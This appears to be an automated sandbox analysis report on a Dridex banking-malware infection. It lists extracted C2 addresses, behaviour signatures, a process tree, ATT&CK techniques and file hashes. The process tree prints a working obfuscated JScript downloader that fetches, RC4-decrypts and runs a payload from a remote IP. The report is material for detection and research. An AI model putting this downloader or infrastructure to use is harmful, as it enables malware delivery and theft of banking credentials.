Resubmissions

20-10-2021 01:50

211020-b9l9kageb6 6

20-10-2021 01:45

211020-b6eqbagea9 10

Analysis

  • max time kernel
    134s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-ja-20211014
  • submitted
    20-10-2021 01:45

General

  • Target

    https://hilltop2exit.xyz/kjlfkvd82d

  • Sample

    211020-b6eqbagea9

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

37.48.124.102:9676

84.33.2.126:6225

188.40.33.77:8194

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Registers COM server for autorun 1 TTPs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Modifies registry class 44 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://hilltop2exit.xyz/kjlfkvd82d
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4456
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4456 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.40/?NTc0ODE4&VhFPEbe&ogfgafgn4=wn3QMvXcLBXQFYPDJf7cT&fhfghddfsdf=arena&sdfsdfdfg=twix&dsfdffg43t=6dDKUfYHliJz5GY3fqSCZz9JHT10NzUSkry6B2aCl_h_fEoL7RSOVDjikTRewdlndhZUAsSoaivhhCGyBSf0sbW_xaIYlhE-qKcHLALhR32zoE&cxssdvxcv=82sstreet.121hg96.406g0h8w9&lzVXTKTNMTc5MDM=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2780
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.40/?NTc0ODE4&VhFPEbe&ogfgafgn4=wn3QMvXcLBXQFYPDJf7cT&fhfghddfsdf=arena&sdfsdfdfg=twix&dsfdffg43t=6dDKUfYHliJz5GY3fqSCZz9JHT10NzUSkry6B2aCl_h_fEoL7RSOVDjikTRewdlndhZUAsSoaivhhCGyBSf0sbW_xaIYlhE-qKcHLALhR32zoE&cxssdvxcv=82sstreet.121hg96.406g0h8w9&lzVXTKTNMTc5MDM=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3596
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c xosz5.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2660
            • C:\Users\Admin\AppData\Local\Temp\xosz5.exe
              xosz5.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4632
  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe"
    1⤵
    • Modifies registry class
    PID:2152

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    bcc1cc8e9989b87087d23e119f44f534

    SHA1

    5f1f9622769b1a11ea6a5a67af094b82d6052fd1

    SHA256

    b4bb217e52ab6f7ddab1ccafda702ac33f338dfc65eaaa955afdb1979f19ca46

    SHA512

    73e3befee1440cf382a23ab83f331f17ada79a72815c5f844336830857c385ead9883eb94bbe0cae9d910618d32964f61bb30650c7e367cea2e8e9bcf4f66552

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    3be0e026c127b5d3327d56f141742935

    SHA1

    655b40b7a5c2c6ad78d4ebd7f91da0e44a7ed850

    SHA256

    442f98517b8a271df518cd1479e65c1c43cea86d24b31a27c0ecffa119d430e6

    SHA512

    970d266bde266a751b2c304dc59a978261c1451c8af2dd7b47664a5d0c3c0391b0a3845ad0e258efe32167bdc8e4e21ed06c5b55f02a9c06e1b30ca128ee9274

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\JQEEFHR9.cookie
    MD5

    33c3f1809bfa6aa75cd7695e023dfdf7

    SHA1

    dca3d2532a2fc6ab6db0d52ec27cfd268f8686be

    SHA256

    6bc4ec8342ae6e39d1c0507851d96e6b3d7e6207bba28d14ef8f3551a299f21c

    SHA512

    4f52badcf1b2ad3a662a12b5e1beaddb59e21498587b81bc06509aeda9b4123812101571106d0ebdb17fd544c473e728ef9b948ab82a938f396880e9e2f3bf93

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\TIQWCGAP.cookie
    MD5

    d030018e5f37ea673b68bfec6ac855f3

    SHA1

    bcde641fc401ca276d50a0e7281efa0ab992f7cb

    SHA256

    f678da573bc0a08d28b061f116572f827479b409bfff92079fff458242ce2bd1

    SHA512

    20c3e9c1c869672b132a9d240138cdf6bafabb1aca7362714f4b5585673c3b22e4ba5072b160ceadb5f1f6501dbab5c247df6fc1a9a774ba94a3d0e9f363dfa9

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\xosz5.exe
    MD5

    99c777be6fb871151545cfcc59c3f89f

    SHA1

    d2855b68c2aa24d4721bc0a30c0e7b2a747acefd

    SHA256

    e3dc9d3ef3a79da287ae7357a2d64c47bb01a27946c62c80225636c1bfa03629

    SHA512

    441792a45ffdd663a3e0b81bc797bab39c9de3ea7bc88814c2722fc4d915dc67ed8ec2eb9688cbcb2ae0550fccfaaa1f481ddf24f47d0050663c5c1fba4c5ef3

  • C:\Users\Admin\AppData\Local\Temp\xosz5.exe
    MD5

    99c777be6fb871151545cfcc59c3f89f

    SHA1

    d2855b68c2aa24d4721bc0a30c0e7b2a747acefd

    SHA256

    e3dc9d3ef3a79da287ae7357a2d64c47bb01a27946c62c80225636c1bfa03629

    SHA512

    441792a45ffdd663a3e0b81bc797bab39c9de3ea7bc88814c2722fc4d915dc67ed8ec2eb9688cbcb2ae0550fccfaaa1f481ddf24f47d0050663c5c1fba4c5ef3

  • memory/524-140-0x0000000000000000-mapping.dmp
  • memory/2660-184-0x0000000000000000-mapping.dmp
  • memory/2780-181-0x0000000000000000-mapping.dmp
  • memory/3596-182-0x0000000000000000-mapping.dmp
  • memory/4456-151-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-166-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-131-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-132-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-133-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-136-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-135-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-137-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-138-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-128-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-141-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-142-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-144-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-145-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-147-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-149-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-150-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-115-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-155-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-156-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-157-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-163-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-164-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-129-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-169-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-170-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-172-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-173-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-175-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-177-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-178-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-179-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-127-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-125-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-124-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-123-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-116-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-122-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-121-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-117-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-119-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4456-120-0x00007FF88E1C0000-0x00007FF88E22B000-memory.dmp
    Filesize

    428KB

  • memory/4632-189-0x0000000000400000-0x000000000047A000-memory.dmp
    Filesize

    488KB

  • memory/4632-188-0x00000000021C0000-0x00000000021FC000-memory.dmp
    Filesize

    240KB

  • memory/4632-185-0x0000000000000000-mapping.dmp